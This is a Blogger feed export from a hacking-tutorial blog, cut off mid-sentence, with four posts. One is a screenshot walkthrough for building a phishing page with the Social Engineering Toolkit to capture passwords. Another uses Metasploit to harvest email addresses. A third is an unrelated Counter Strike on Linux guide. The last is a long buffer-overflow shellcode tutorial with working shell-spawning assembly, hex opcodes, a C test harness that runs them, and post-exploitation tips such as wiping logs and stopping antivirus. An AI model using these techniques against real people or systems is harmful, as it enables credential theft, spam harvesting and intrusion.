tag:blogger.com,1999:blog-32994688246004843672024-03-13T00:28:07.595-07:00Break The securitylearn to secure your self and your serverIndian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.comBlogger41125tag:blogger.com,1999:blog-3299468824600484367.post-36409259532324299232011-12-05T08:04:00.001-08:002011-12-05T08:08:47.706-08:00SET (social engg toolkit ) metaspliot<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV50B9ry-wAvcPuUkU1WeB71Ktzafs2MJr3iFETJiNDqOwtIzuHNnXia-_eUwMK9U5hEtTLGnHTfSbSpFvRJRgPjGQFJJrA6tdhnHWTwfVnMJCZMYd8X8fsYINKMj2hjw4qesqUnC2cqA/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A29%253A47++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV50B9ry-wAvcPuUkU1WeB71Ktzafs2MJr3iFETJiNDqOwtIzuHNnXia-_eUwMK9U5hEtTLGnHTfSbSpFvRJRgPjGQFJJrA6tdhnHWTwfVnMJCZMYd8X8fsYINKMj2hjw4qesqUnC2cqA/s320/Screenshot+-+Monday+05+December+2011+-+09%253A29%253A47++IST.png" width="320" /></a></div>
type:2<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwVHh8QoWK49UKqnq1LAxMwIenoX8VYAW5PKbqzZ0pjeFcpkXCiRDBn6CTP8QQ5q_30rhbFzSqJUI2feDI2d-i4-P12amQy-7ZXCbfuhTXRuVWJDQkSRhy3dwZAh32_7CDa3CPjGyHj8/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A01++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwVHh8QoWK49UKqnq1LAxMwIenoX8VYAW5PKbqzZ0pjeFcpkXCiRDBn6CTP8QQ5q_30rhbFzSqJUI2feDI2d-i4-P12amQy-7ZXCbfuhTXRuVWJDQkSRhy3dwZAh32_7CDa3CPjGyHj8/s320/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A01++IST.png" width="320" /></a></div>
type:3<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7oW9dtk9VbvW-dfMoGaOCj_UwwKcHopRc8Zek0ajI2Qfp6Vd1gwr6pyjKEpsli88VkEQ7M0Q5mnKkFjclNvdbIfz9MUNpqhPWM7V8jikPazmRTZUz5uWdbGV7yxI2mmNZ7tdgJKbRZJc/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A15++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7oW9dtk9VbvW-dfMoGaOCj_UwwKcHopRc8Zek0ajI2Qfp6Vd1gwr6pyjKEpsli88VkEQ7M0Q5mnKkFjclNvdbIfz9MUNpqhPWM7V8jikPazmRTZUz5uWdbGV7yxI2mmNZ7tdgJKbRZJc/s320/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A15++IST.png" width="320" /></a></div>
type:2<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwg_fzRHDsVKKL_njnQweZ7noXDklaL6WJxb_D-o80duXQ-24Gcay3N_szFQzv6MbIqJURJT4q74IrWE92aAO7_Jn6whyphenhyphenX7SmWHy7yhqQYzhEl1WsZlEHwVXq5WTcxvbeq2q3Mx4Dm03U/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A31++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggT_V7FZS2oOotT_cuZJ_87qpvjL_mYvkcxV7Eu1Y6TWFtk9uw9_hbNknX9f0mJAemrQkoJ-RwyDwyj6tzyVgITU3HlswflPPCzwuk8lies4UyWBZ_UEDQGEIXuH7pUidZTIUXeloDON8/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A48++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggT_V7FZS2oOotT_cuZJ_87qpvjL_mYvkcxV7Eu1Y6TWFtk9uw9_hbNknX9f0mJAemrQkoJ-RwyDwyj6tzyVgITU3HlswflPPCzwuk8lies4UyWBZ_UEDQGEIXuH7pUidZTIUXeloDON8/s320/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A48++IST.png" width="320" /></a></div>
hit enter:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghPi6awq0CMN6Vc0TBniUiOApRt_Ws3jAHeBPhreVN9DLdqT6zXdO3H2QP6GrrAk3Z6kDKDS5Wi9CwGnqZFL-onkTwBRDz86fRmK5-tqzwhAlc11TQDCkpP_7hyphenhypheniRf4eHOyDTOfV_XJU8/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A00++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghPi6awq0CMN6Vc0TBniUiOApRt_Ws3jAHeBPhreVN9DLdqT6zXdO3H2QP6GrrAk3Z6kDKDS5Wi9CwGnqZFL-onkTwBRDz86fRmK5-tqzwhAlc11TQDCkpP_7hyphenhypheniRf4eHOyDTOfV_XJU8/s320/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A00++IST.png" width="320" /></a></div>
there you go to find the phish page u need to forward ur ip and your fake page is ready <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ3JW3bI3bGHL_RJeIsKcL5aKDCe_8FO3TteaI6u6OP-X5RDFS7QTqHVhyphenhyphentckBonypLvndx1ZounEzy-NN5UrzwgY3tu2KWCBiEyBGS8COB9pCOLrcKwGXAOsKYxJ-NWYylZPh3fn6l9I/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A29++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ3JW3bI3bGHL_RJeIsKcL5aKDCe_8FO3TteaI6u6OP-X5RDFS7QTqHVhyphenhyphentckBonypLvndx1ZounEzy-NN5UrzwgY3tu2KWCBiEyBGS8COB9pCOLrcKwGXAOsKYxJ-NWYylZPh3fn6l9I/s320/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A29++IST.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghf3vhOpXnVC1DG3Z1Fr9TccI-Uaf1diGN373-NpM42yhX5bxvFDbwpwONakcG4c2C5RIOG11Rg8gtjrtX_1OnobdzIGgLVpxJvHPrqrGx7MFYFnC8E_JeZF5r7qg0GqITaRYK9d0ZTqQ/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A16++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghf3vhOpXnVC1DG3Z1Fr9TccI-Uaf1diGN373-NpM42yhX5bxvFDbwpwONakcG4c2C5RIOG11Rg8gtjrtX_1OnobdzIGgLVpxJvHPrqrGx7MFYFnC8E_JeZF5r7qg0GqITaRYK9d0ZTqQ/s320/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A16++IST.png" width="320" /></a></div>
<br />thats it you got the pass <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDD0nagKS_6mwee-zrS90hyphenhyphennAamOVkFc-TFvRsgmFj8PNES4a8-q_ZVKaLpBfJbvHnmJPvRNNYmEJbgXqz5gckD_QLa8lzu99xZiC9p1XDF_Nf1dEconJ0isHU4rRhAkg9TtRaKACp8jE/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A58++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDD0nagKS_6mwee-zrS90hyphenhyphennAamOVkFc-TFvRsgmFj8PNES4a8-q_ZVKaLpBfJbvHnmJPvRNNYmEJbgXqz5gckD_QLa8lzu99xZiC9p1XDF_Nf1dEconJ0isHU4rRhAkg9TtRaKACp8jE/s320/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A58++IST.png" width="320" /><br /><br /><br /></a></div>
<br /></div>Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com3tag:blogger.com,1999:blog-3299468824600484367.post-9564328974653652962011-12-05T07:04:00.001-08:002011-12-05T07:05:28.709-08:00METASPLOIT EMAIL HARSVESTING<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="post_body" id="pid_17926652">
<span style="color: lightskyblue;">IN THIS TUT I WILL SHOW YOU CAN TO USE METASPLOIT TO GET LIST OF EMAIL ADDRESS </span><br />
<br />
<span style="color: dodgerblue;">OPEN TERMINAL AND TYPE</span><br />
<blockquote>
<cite>Quote:</cite>msfconsole</blockquote>
<br />
<img alt="[Image: NU7xE.png]" border="0" src="http://i.imgur.com/NU7xE.png" /><br />
<br />
<br />
<span style="color: dodgerblue;">NEXT STEP:</span><br />
<span style="color: dodgerblue;">NOW WE HAVE TO SEARCH FOR EXPLOIT BY TYPING</span><br />
<blockquote>
<cite>Quote:</cite>search gather </blockquote>
<img alt="[Image: Ib0ue.png]" border="0" src="http://i.imgur.com/Ib0ue.png" /><br />
<span style="color: deepskyblue;">YOU WILL FIND MANY EXPLOITS WE ARE GOING TO USE IS</span><br />
<span style="color: red;">auxiliary/gather/search_email_collector </span><br />
<img alt="[Image: UIQpF.png]" border="0" src="http://i.imgur.com/UIQpF.png" /><br />
<br />
<span style="color: dodgerblue;">NEXT STEP:<br />
SELECT THE EXPLOIT BY TYPING</span><br />
<blockquote>
<cite>Quote:</cite>use auxiliary/gather/search_email_collector </blockquote>
<img alt="[Image: fqYEW.png]" border="0" src="http://i.imgur.com/fqYEW.png" /><br />
<span style="color: dodgerblue;"><br />
NEXT STEP:<br />
NOW WE ARE GOING TO CON FIG THE EXPLOIT ACCORDING TO US LIKE SETTING THE
DOMAIN BY TYPING [YOU CAN EVEN VIEW THE OPTIONS AVAILABLE BY TYPING
(SHOW OPTIONS) ]</span><br />
<blockquote>
<cite>Quote:</cite>set domain site.com</blockquote>
<img alt="[Image: FPtO8.png]" border="0" src="http://i.imgur.com/FPtO8.png" /><br />
<br />
<span style="color: dodgerblue;">NEXT STEP:<br />
AFTER SETTING THE DOMAIN WE ARE GOING TO RUN THE COLLECTOR<br />
BY TYPING</span><br />
<blockquote>
<cite>Quote:</cite>run</blockquote>
<img alt="[Image: mRcMu.png]" border="0" src="http://i.imgur.com/mRcMu.png" /><br />
<span style="color: dodgerblue;"><br />
NEXT STEP:<br />
NOW THE COLLECTOR WILL START COLLECTING THE EMAILS FROM GOOGLE<br />
BING YAHOO</span><br />
<span style="color: dodgerblue;"><br />
NEXT STEP:<br />
BOOOM U GOT THE LIST </span><br />
<img alt="[Image: CXmuh.png]" border="0" src="http://i.imgur.com/CXmuh.png" /><br />
<span style="color: red;"><br />
HOPE U LIKE THIS TUT </span><br />
<span style="color: red;">PLZ COMMENT AND REPLY</span> <img alt="Victoire" border="0" src="http://www.hackforums.net/images/smilies/victoire.gif" style="vertical-align: middle;" title="Victoire" /><img alt="Victoire" border="0" src="http://www.hackforums.net/images/smilies/victoire.gif" style="vertical-align: middle;" title="Victoire" /><img alt="Victoire" border="0" src="http://www.hackforums.net/images/smilies/victoire.gif" style="vertical-align: middle;" title="Victoire" /><br />
<span style="color: red;">YOU CAN COPY PASTE IT</span> <img alt="Victoire" border="0" src="http://www.hackforums.net/images/smilies/victoire.gif" style="vertical-align: middle;" title="Victoire" /><img alt="Victoire" border="0" src="http://www.hackforums.net/images/smilies/victoire.gif" style="vertical-align: middle;" title="Victoire" /> I<span style="color: red;">F POSSIBLE GIVE CREDIT</span> <img alt="Superman" border="0" src="http://www.hackforums.net/images/smilies/superman.gif" style="vertical-align: middle;" title="Superman" /><img alt="Superman" border="0" src="http://www.hackforums.net/images/smilies/superman.gif" style="vertical-align: middle;" title="Superman" /><img alt="Superman" border="0" src="http://www.hackforums.net/images/smilies/superman.gif" style="vertical-align: middle;" title="Superman" />
</div>
</div>Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com2tag:blogger.com,1999:blog-3299468824600484367.post-34266423574938336612011-10-01T07:27:00.000-07:002011-10-01T07:49:28.147-07:00Install and Play Counter Strike on linux<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj35S0towSx_2-o1d6IVuWeEwbZFzo5BiU6skf8sGRivPTTXMLM4EcaL9m20lyKDGGQ9igWmtVIQWzQK5Hdj1oOKASXKLu5d7guqsuT6bJ4QTYtfh6WBh3m1txYllk5v7lJ5mCTQzqyG8/s1600/xlarge_cs_go_impressions.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj35S0towSx_2-o1d6IVuWeEwbZFzo5BiU6skf8sGRivPTTXMLM4EcaL9m20lyKDGGQ9igWmtVIQWzQK5Hdj1oOKASXKLu5d7guqsuT6bJ4QTYtfh6WBh3m1txYllk5v7lJ5mCTQzqyG8/s320/xlarge_cs_go_impressions.jpg" width="320" /></a></div>
<b><span style="font-size: small;"><br />This article teaches you how to install, run and play Counter Strike on Ubuntu.<br />Counter Strike<br /><br />Counter Strike<br /><br />1. If you don’t have Wine installed, first fire up your terminal and install it using the command below:<br />sudo apt-get install wine<br /><br />2. Download the tahoma font, needed for steam to function:<br />wget www.rzs.rs.ba/Fontovi/Tahoma.TTF<br /><br />3. Move the font to the wine font directory:<br />mv Tahoma.TTF ~/.wine/drive_c/windows/fonts/<br /><br />please don't leech the article if so use your url it <br />4. Install Steam:<br /><br />a. If you have SteamInstall.exe donwloaded, enter the following command to install it:<br /><br />wine SteamInstall.exe<br /><br />b. If you have SteamInstall.msi donwloaded, enter the following command to install it:<br /><br />wine msiexec /i SteamInstall.msi<br /><br />5. Install Half-Life 2 from the CD<br />wine msiexec /i /path/to/HL2/steam.msi<br /><br />6. Login<br />WINEDEBUG="fixme-all" wine Steam<br /><br />If you can’t type in your login, just right-click on the Login edit control in the Steam button and then left-click on it again to make the menu disappear. Yahoo! You can type your login now.<br /><br />copyright @ securityowned.blogspot.com</span></b></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com3tag:blogger.com,1999:blog-3299468824600484367.post-25149318467291148672011-09-30T23:35:00.000-07:002011-09-30T23:35:28.856-07:00BUFFER OVERFLOW Shellcode: The Payload<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>SHELLCODE<br /><br /><br /><br />In order to execute our raw exploit codes directly in the stack or other parts of the memory, which deal with binary, we need assembly codes that represent a raw set of machine instructions of the target machines. A shellcode is an assembly language program which executes a shell, such as the '/bin/sh' for Unix/Linux shell, or the command.com shell on DOS and Microsoft Windows. Bear in mind that in exploit, not just a normal shell but what we want is a root shell or Administrator privilege (note: In certain circumstances, in Windows there are account that having privileges higher than Administrator such as LocalSystem). Shellcode is used to spawn a (root) shell because it will give us the highest privilege. A shellcode may be used as an exploit payload, providing a hacker or attacker with command line access to a computer system. Shellcodes are typically injected into computer memory by exploiting stack or heap-based buffer overflows vulnerabilities, or format string attacks. In a classic and normal exploits, shellcode execution can be triggered by overwriting a stack return address with the address of the injected shellcode. As a result, instead the subroutine returns to the caller, it returns to the shellcode, spawning a shell. Examples of shellcodes may be in the following forms:<br /><br /><a href="http://adf.ly/2yvsn">CLICK HERE</a><br /><br />As an assembly language - shellcode.s (shellcode.asm – for Windows):<br /><br /> #a very simple assembly (AT&T/Linux) program for spawning a shell<br /><br /> .section .data<br /><br /> .section .text<br /><br /> .globl _start<br /><br /> <br /><br /> _start:<br /><br /> xor %eax, %eax<br /><br /> mov $70, %al #setreuid is syscall 70<br /><br /> xor %ebx, %ebx<br /><br /> xor %ecx, %ecx<br /><br /> int $0x80<br /><br /> <br /><br /> jmp ender<br /><br /> <br /><br /> starter:<br /><br /> popl %ebx #get the address of the string<br /><br /> xor %eax, %eax<br /><br /> mov %al, 0x07(%ebx) #put a NULL where the N is in the string<br /><br /> movl %ebx, 0x08(%ebx) #put the address of the string<br /><br /> #to where the AAAA is<br /><br /> movl %ebx, 0x0c(%ebx) #put 4 null bytes into where the BBBB is<br /><br /> mov $11, %al #execve is syscall 11<br /><br /> lea 0x08(%ebx), %ecx #load the address of where the AAAA was<br /><br /> lea 0x0c(%ebx), %edx #load the address of the NULLS<br /><br /> int $0x80 #call the kernel<br /><br /> <br /><br /> ender:<br /><br /> call starter<br /><br /> .string "/bin/shNAAAABBBB"<br /><br /><br /><br />As a C program - shellcode.c:<br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main(int argc, char*argv[ ])<br /><br /> {<br /><br /> char *shell[2];<br /><br /> <br /><br /> shell[0] = "/bin/sh";<br /><br /> shell[1] = NULL;<br /><br /> execve(shell[0], shell, NULL);<br /><br /> return 0;<br /><br /> }<br /><br />Take note that the assembly code can be embedded in the C code using the __asm__ keyword and asm for the reverse (GCC, Microsoft). As a null terminated C string char array in C program:<br /><br /> char shellcode[ ] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";<br /><br />The shellcode declared as a C string of char type may be the most widely used in exploit codes and the typical format is shown below:<br /><br /> char shcode[ ] = "\x90\x31\x89...";<br /><br /> char shcode[ ] = {0x90,0x90,0x31,...};<br /><br />In a wider definition, shell code not just be used to spawn a shell, it also can be used to create a general payload. Generally an exploit usually consists of two major components:<br /><br /><br /><br /> The exploitation technique.<br /><br /> The payload.<br /><br /><br /><br />The objective of the exploitation part is to divert the execution path of the vulnerable program. We can achieve that through one of the following techniques:<br /><br /><br /><br /> Stack-based Buffer Overflow.<br /><br /> Heap-based Buffer Overflow.<br /><br /> Integer Overflow.<br /><br /> Format String.<br /><br /> Race condition.<br /><br /> Memory corruption, etc.<br /><br /><br /><br />Once we control the execution path, we probably want it to execute our code. In this case, we need to include these codes or instruction sets in our exploit. Then, the part of code which allows us to execute arbitrary code is known as payload. The payload can virtually do everything a computer program can do with the appropriate permission and right of the vulnerable programs or services.<br /><br /><br />Shellcode as a payload<br /><br /><br /><br />When the shell is spawned, it may be the simplest way that allows the attacker to explore the target system interactively. For example, it might give the attacker the ability to discover internal network, to further penetrate into other computers. A shell may also allow upload/download file/database, which is usually needed as proof of successful penetration test (pen-test). You also may easily install Trojan horse, key logger, sniffer, enterprise worm, WinVNC, etc. A shell is also useful to restart the vulnerable services keeping the service running. But more importantly, restarting the vulnerable service usually allows us to attack the service again. We also may clean up traces like log files and events with a shell. For Windows we may alter the registry to make it running for every system start up and stopping any antivirus programs.<br /><br />You also can create a payload that loop and wait for commands from the attacker. The attacker could issue a command to the payload to create new connection, upload/download file or spawn another shell. There are also a few others payload strategies in which the payload will loop and wait for additional payload from the attacker such as in multistage exploits and the (Distributed) Denial of Service (DDOS/DOS). Regardless whether a payload is spawning a shell or loop to wait for instructions; it still needs to communicate with the attacker, locally or remotely. There are so many things that can be done.<br /><br /><br />Shellcode elements<br /><br /><br /><br />This section will limit the discussion of the payload used to exploit stack based buffer overflows in binary, machine-readable program. In this program, the shellcode must also be machine-readable. The shellcode cannot contain any null bytes (0x00). Null (‘\0’) is a string delimiter which instructs all C string functions (and other similar implementations), once found, will stop processing the string (a null-terminated string). Depending on the platform used, not just the NULL byte, there are other delimiters such as linefeed (LF-0x0A), carriage return (CR-0x0D), backslash ( \ ) and NOP (No Operation) instruction that must also be considered when creating a workable shellcode. In the best situations the shellcode may only contain alphanumeric characters. Fortunately, there are several programs called Encoder that can be used to eliminate the NULL and other delimiter characters. <br /><br />In order to be able to generate machine code that really works, you have to write the assembly code differently, but still have it serve its purpose. You need to do some tricks here and there to produce the same result as the optimal machine code.<br /><br />Since it’s important that the shellcode should be as small as possible, the shellcode writer usually writes the code in the assembly language, then extracting the opcodes in the hexadecimal format and finally using the code in a program as string variables. Reliable standard libraries are not available for shellcodes; we usually have to use the kernel syscalls (system call) of the operating system directly. Shellcode also is OS and architecture dependent. Workable shellcode also must consider bypassing the network system protection such as firewall and Intrusion Detection System (IDS).<br /><br /><br />Creating a shellcode: Making the code portable<br /><br /><br />Writing shellcode is slightly different from writing normal assembly code and the main one is the portability issue. Since we do not know which address we are at, it is not possible to access our data and even more impossible to hardcode a memory address directly in our program. We have to apply a trick to be able to make shellcode without having to reference the arguments in memory the conventional way, by giving their exact address on the memory page, which can only be done at compile time. Although this is a significant disadvantage, there are always workarounds for this issue. The easiest way is to use a string or data in the shellcode as shown in the following simple example.<br /><br /> .section .data<br /><br /> #only use register here...<br /><br /> <br /><br /> .section .text<br /><br /> <br /><br /> .globl _start<br /><br /> <br /><br /> jmp dummy<br /><br /> <br /><br /> _start:<br /><br /> #pop register, so we know the string location<br /><br /> #Here we have assembly instructions which will use the string<br /><br /> <br /><br /> dummy:<br /><br /> call _start<br /><br /> <br /><br /> .string "Simple String"<br /><br />What is occurring in this code is that we jmp to the label dummy and then from there call _start label. Once we are at the _start label, we can pop a register which will cause that register to contain the location of our string. CALL is used because it will automatically store the return address on the stack. As discussed before, the return address is the address of the next 4 bytes after the CALL instruction. By placing a variable right behind the call, we indirectly push its address on the stack without having to know it. This is a very useful trick when we do not know where is our code will be executed from. The code arrangement example using C can be illustrated as the following.<br /><br /><br /><br />Example:<br /><br /> void main(int argc, char **argv)<br /><br /> {<br /><br /> char *name[2];<br /><br /> name[0] = "/bin/sh";<br /><br /> name[1] = NULL;<br /><br /> <br /><br /> /*int execve(char *file, char *argv[], char *env[ ])*/<br /><br /> execve(name[0], name, NULL);<br /><br /> exit(0);<br /><br /> }<br /><br />Registers usage:<br /><br /> EAX: 0xb – syscall number.<br /><br /> EBX: Address of program name (address of name[0]).<br /><br /> ECX: Address of null-terminated argument-vector, argv (address of name).<br /><br /> EDX: Address of null-terminated environment-vector, env/enp (NULL).<br /><br /><br /><br />In this program, we need:<br /><br /> String /bin/sh somewhere in memory.<br /><br /> An Address of the string.<br /><br /> String /bin/sh followed by a NULL somewhere in memory.<br /><br /> An Address of address of string.<br /><br /> NULL somewhere in memory.<br /><br /><br /><br />To determine address of string we can make use of instructions using relative addressing. We know that call instruction saves EIP on the stack and jumps to the function so:<br /><br /> Use jmp instruction at the beginning of shell code to CALL instruction.<br /><br /> call instruction right before /bin/sh string.<br /><br /> call jumps back to the first instruction after jump.<br /><br /> Now the address of /bin/sh should be on the stack.<br /><br /><br /><br />A trick to determine the address of string<br /><br />Figure 1: A trick to determine the address of string.<br /><br /><br /><br />If you are going to write code more complex than just spawning a simple shell, you can put more than one .string behind the CALL. Here, you know the size of those strings and can therefore calculate their relative locations once you know where the first string is located. With this knowledge, let’s try creating a simple shellcode that spawn a shell. The main points here are the similar process and steps that can be followed to create shellcodes. The following is a simple program example to spawn a shell in assembly (AT&T/Linux).<br /><br /> #assembly (AT&T/Linux) for spawning a shell<br /><br /> ####### testshell2.s ############<br /><br /> <br /><br /> .section .data<br /><br /> .section .text<br /><br /> .globl _start<br /><br /> <br /><br /> _start:<br /><br /> xor %eax, %eax #clear register<br /><br /> mov $70, %al #setreuid is syscall 70<br /><br /> xor %ebx, %ebx #clear register, empty<br /><br /> xor %ecx, %ecx #clear register, empty<br /><br /> int $0x80 #interrupt 0x80<br /><br /> <br /><br /> jmp ender<br /><br /> <br /><br /> starter:<br /><br /> popl %ebx #get the address of the string, in %ebx<br /><br /> xor %eax, %eax #clear register<br /><br /> mov %al, 0x07(%ebx) #put a NULL where the N is in the string<br /><br /> movl %ebx, 0x08(%ebx) #put the address of the string to where the AAAA is<br /><br /> movl %eax, 0x0c(%ebx) #put 4 null bytes into where the BBBB is<br /><br /> mov $11, %al #execve is syscall 11<br /><br /> lea 0x08(%ebx), %ecx #load the address of where the AAAA was<br /><br /> lea 0x0c(%ebx), %edx #load the address of the NULLS<br /><br /> int $0x80 #call the kernel<br /><br /> <br /><br /> ender:<br /><br /> call starter<br /><br /> .string "/bin/shNAAAABBBB" #16 bytes of string...<br /><br /><br /><br />Basically, before the call starter the memory arrangement should be something like this (Little Endian):<br /><br /><br /><br />Memory arrangement for our shellcode<br /><br />Figure 2: Memory arrangement for our assembly code.<br /><br /><br /><br />When the starter: portion is executed the memory arrangement should be something like this:<br /><br /><br /><br />Memory arrangement for our shellcode<br /><br />Where:<br /><br />a<br /> <br /><br />- Address of the string<br /><br /><br /><br />Figure 3: Memory arrangement for our shellcode.<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Let compile and link the program and then disassemble it to get the equivalent hexadecimal opcodes.<br /><br /> [bodo@lethalcode testbed8]$ as testshell2.s -o testshell2.o<br /><br /> [bodo@lethalcode testbed8]$ ld testshell2.o -o testshell2<br /><br /> [bodo@lethalcode testbed8]$ objdump -d testshell2<br /><br /> <br /><br /> testshell2: file format elf32-i386<br /><br /> <br /><br /> Disassembly of section .text:<br /><br /> <br /><br /> 08048074 <_start>:<br /><br /> 8048074: 31 c0 xor %eax, %eax<br /><br /> 8048076: b0 46 mov $0x46, %al<br /><br /> 8048078: 31 db xor %ebx, %ebx<br /><br /> 804807a: 31 c9 xor %ecx, %ecx<br /><br /> 804807c: eb 16 jmp 8048094 <ender><br /><br /> <br /><br /> 0804807e <starter>:<br /><br /> 804807e: 5b pop %ebx<br /><br /> 804807f: 31 c0 xor %eax, %eax<br /><br /> 8048081: 88 43 07 mov %al, 0x7(%ebx)<br /><br /> 8048084: 89 5b 08 mov %ebx, 0x8(%ebx)<br /><br /> 8048087: 89 43 0c mov %eax, 0xc(%ebx)<br /><br /> 804808a: b0 0b mov $0xb, %al<br /><br /> 804808c: 8d 4b 08 lea 0x8(%ebx), %ecx<br /><br /> 804808f: 8d 53 0c lea 0xc(%ebx), %edx<br /><br /> 8048092: cd 80 int $0x80<br /><br /> <br /><br /> 08048094 <ender>:<br /><br /> 8048094: e8 e5 ff ff ff call 804807e <starter><br /><br /> 8048099: 2f das<br /><br /> 804809a: 62 69 6e bound %ebp, 0x6e(%ecx)<br /><br /> 804809d: 2f das<br /><br /> 804809e: 73 68 jae 8048108 <ender+0x74><br /><br /> 80480a0: 4e dec %esi<br /><br /> 80480a1: 41 inc %ecx<br /><br /> 80480a2: 41 inc %ecx<br /><br /> 80480a3: 41 inc %ecx<br /><br /> 80480a4: 41 inc %ecx<br /><br /> 80480a5: 42 inc %edx<br /><br /> 80480a6: 42 inc %edx<br /><br /> 80480a7: 42 inc %edx<br /><br /> 80480a8: 42 inc %edx<br /><br /> ...<br /><br />Next, arrange the hexadecimal opcodes in char type array (C string).<br /><br /> char code[ ] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"<br /><br /> "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"<br /><br /> "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"<br /><br /> "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"<br /><br /> "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";<br /><br />Finally insert the shellcode into our test program, compile and run.<br /><br /> /*test.c*/<br /><br /> #include <unistd.h><br /><br /> <br /><br /> char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"<br /><br /> "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"<br /><br /> "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"<br /><br /> "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"<br /><br /> "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";<br /><br /> <br /><br /> int main(int argc, char **argv)<br /><br /> {<br /><br /> /*creating a function pointer*/<br /><br /> int (*func)();<br /><br /> func = (int (*)()) code;<br /><br /> (int)(*func)();<br /><br /> }<br /><br /> <br /><br /> [bodo@lethalcode testbed8]$ gcc -g test.c -o test<br /><br /> [bodo@lethalcode testbed8]$ execstack -s test<br /><br /> [bodo@lethalcode testbed8]$ ./test<br /><br /> sh-3.00$<br /><br /><br /><br />Well it works. Now, let try another example by using a simple C program. In this example we are using system call for exit(0), that is exit with no error and the program is shown below.<br /><br /> /* exit.c */<br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main()<br /><br /> {<br /><br /> exit(0);<br /><br /> }<br /><br />Do some 